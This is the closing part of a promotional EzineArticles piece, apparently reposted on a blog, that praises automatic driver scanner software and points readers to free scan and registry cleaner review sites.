However, because of a very recent innovation, finding if a computer has a bad or outdated driver is not a difficult undertaking anymore! Now, there is an excellent new tool called a driver scanner that does 100% of the work for us! All we do is start it up and the driver scanner will find any bad or outdated driver we have and it will then upgrade it automatically for us.
The way I see it, driver scanners are worth their weight in gold because they easily do a job that was once very difficult and time consuming. Due to the expense of dealing with them, the fact there could have been outdated drivers in a PC used to be ignored unless these bad drivers were causing major harm.
So, it was common for a computer operator to have to put up with a few irregularities in his or her computer's performance indefinitely. Now that a good driver scanner can take care of the matter, we don't have to accept these irregularities anymore!
You've learned a lot in this article about getting a computer to run fast again. Now find out how to get free spyware/virus scans, free registry scans and even a free driver scan. All you have to do is visit this free site: Repair Slow Computer. Also, find how all the top registry cleaners rate against one another in the most up to date registry cleaner comparison chart on the net: Registry Cleaner Reviews.
Article Source: http://EzineArticles.com/?expert=Edward_Lathrop

 
Design and Bloggerized by JMD Computer